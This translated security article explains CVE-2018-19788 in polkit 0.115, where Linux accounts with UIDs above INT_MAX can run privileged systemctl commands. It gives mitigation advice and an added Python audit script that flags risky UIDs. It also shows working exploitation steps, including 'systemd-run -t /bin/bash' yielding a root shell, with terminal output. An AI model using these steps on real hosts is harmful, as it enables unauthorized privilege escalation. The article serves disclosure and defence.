
Unprivileged Linux users with UID > INT_MAX can execute any command.

Sit down, I have news that will shock you...

There is a vulnerability in Linux operating systems that allows a low-privileged user to execute any systemctl command (and even become root - translator's comment) if their UID is greater than 2147483647.


The described vulnerability, tracked as CVE-2018-19788, is in the PolicyKit library (also known as polkit) version 0.115, which comes pre-installed on most popular Linux distributions, including Red Hat, Debian, Ubuntu, and CentOS. Polkit is a component of UNIX-like systems used to define policies and to let unprivileged processes request access to privileged operations. Unlike "sudo", it does not grant the user's process administrative rights wholesale, but allows fine-grained control over what is allowed and what is prohibited.
The vulnerability exists because of an error in how PolicyKit checks authorization requests from any user with a UID greater than INT_MAX, where INT_MAX is the constant holding the maximum value of a signed integer variable: 2147483647 (0x7FFFFFFF in hexadecimal).

Thus, if an account is created with any UID exceeding INT_MAX, the PolicyKit component will let it successfully execute any systemctl command.

Security researcher Rich Mirch, who goes by "0xm1rch" on Twitter, released a proof-of-concept (PoC) exploit that demonstrates the vulnerability using a user with a UID of 4,000,000,000.

Red Hat recommends that system administrators not allow any negative UID or UID greater than 2147483646 to mitigate the problem before the patch is released.
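To make the INT_MAX boundary concrete and to give administrators a way to apply Red Hat's interim guidance, here is an added audit script. It is not from the original article or from the polkit project; it reinterprets each UID the way a signed 32-bit C 'gint' would see it and flags every account in /etc/passwd-format text whose UID is negative or above 2147483646. The sample passwd content is constructed for the example; the account names and UIDs in it are assumptions, not values from any real host.

```python
from typing import List, Tuple

# Added audit example (not from the original article). polkit 0.115 stored the
# caller's UID in a signed 32-bit 'gint', so any UID above INT_MAX wraps to a
# negative number (CVE-2018-19788).
INT_MAX = 2147483647  # 0x7FFFFFFF, the limit named in the article
UID_LIMIT = 2147483646  # Red Hat's interim guidance: no UID above this, none negative


def to_gint(uid: int) -> int:
    """Reinterpret an unsigned 32-bit UID as a signed 32-bit C 'gint'."""
    uid &= 0xFFFFFFFF
    return uid - 0x100000000 if uid > INT_MAX else uid


def uid_is_risky(uid: int) -> bool:
    """True for UIDs that Red Hat advised against while the patch was pending."""
    return uid < 0 or uid > UID_LIMIT


def audit_passwd(passwd_text: str) -> List[Tuple[str, int, int]]:
    """Return (name, uid, uid_as_gint) for every risky account in passwd-format text."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue  # malformed entry: skip rather than guess its layout
        name, uid_field = fields[0], fields[2]
        try:
            uid = int(uid_field)
        except ValueError:
            continue  # non-numeric UID field, e.g. NIS '+' entries
        if uid_is_risky(uid):
            findings.append((name, uid, to_gint(uid)))
    return findings


# Constructed sample /etc/passwd content (assumption for the example, not from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
poc:x:4000000000:4000000000:PoC-sized UID:/home/poc:/bin/bash
wrap:x:2147483650:2147483650:wraps to -2147483646:/home/wrap:/bin/bash
edge:x:2147483647:2147483647:INT_MAX itself:/home/edge:/bin/bash
"""

if __name__ == "__main__":
    for name, uid, as_gint in audit_passwd(SAMPLE_PASSWD):
        print(f"{name}: uid={uid} is seen through a gint as {as_gint}")
    # On a live system: audit_passwd(open("/etc/passwd").read())
```

The value -2147483646 that appears in the error output later in this article is exactly what `to_gint` produces for UID 2147483650, i.e. INT_MAX + 3; the 4,000,000,000 UID of the public PoC becomes -294967296. The script flags INT_MAX itself as well, because Red Hat's guidance draws the line at 2147483646.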

Several methods of exploitation

The first way is simply via systemctl. I created a user with a large UID, then tried to start apache2:

1) First I checked that the service was down:

    $ systemctl status apache2
    ● apache2.service - The Apache HTTP Server
       Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset:
      Drop-In: /lib/systemd/system/apache2.service.d
               └─apache2-systemd.conf
       Active: inactive (dead)

2) I tried to start it, but got an error:

    $ systemctl start apache2
    (process:2820): GLib-GObject-WARNING **: 00:42:35.586: value "-2147483646" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
    ** ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)

3) But then I confirmed that it had started anyway:

    $ systemctl status apache2
    ● apache2.service - The Apache HTTP Server
       Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset:
      Drop-In: /lib/systemd/system/apache2.service.d
               └─apache2-systemd.conf
       Active: active (running) since Tue 2018-12-11 00:42:35 +04; 2s ago
      Process: 2825 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCE
     Main PID: 2829 (apache2)
        Tasks: 55 (limit: 4526)
       CGroup: /system.slice/apache2.service
               ├─2829 /usr/sbin/apache2 -k start
               ├─2830 /usr/sbin/apache2 -k start
               └─2831 /usr/sbin/apache2 -k start

The second way is to get a bash shell through systemd. I ran the following command, then created a text file in the root of the filesystem, wrote a line to it, and checked the result:

    $ systemd-run -t /bin/bash
    (process:3947): GLib-GObject-WARNING **: 01:24:30.023: value "-2147483646" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
    ** ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
    Running as unit: run-u107.service
    Press ^] three times within 1s to disconnect TTY.
    # echo hello > /test.txt
    # cat /test.txt
    hello

While experimenting on my Ubuntu machine, I noticed another pattern: if you open the account settings while logged in as a user with such a UID, all the settings are unlocked, which lets you edit or delete any user.

The open question is how an attacker would "cause" a user with such a UID to appear on the victim host in the first place, and whether this bug really poses a threat.

Source: https://habr.com/ru/post/432610/
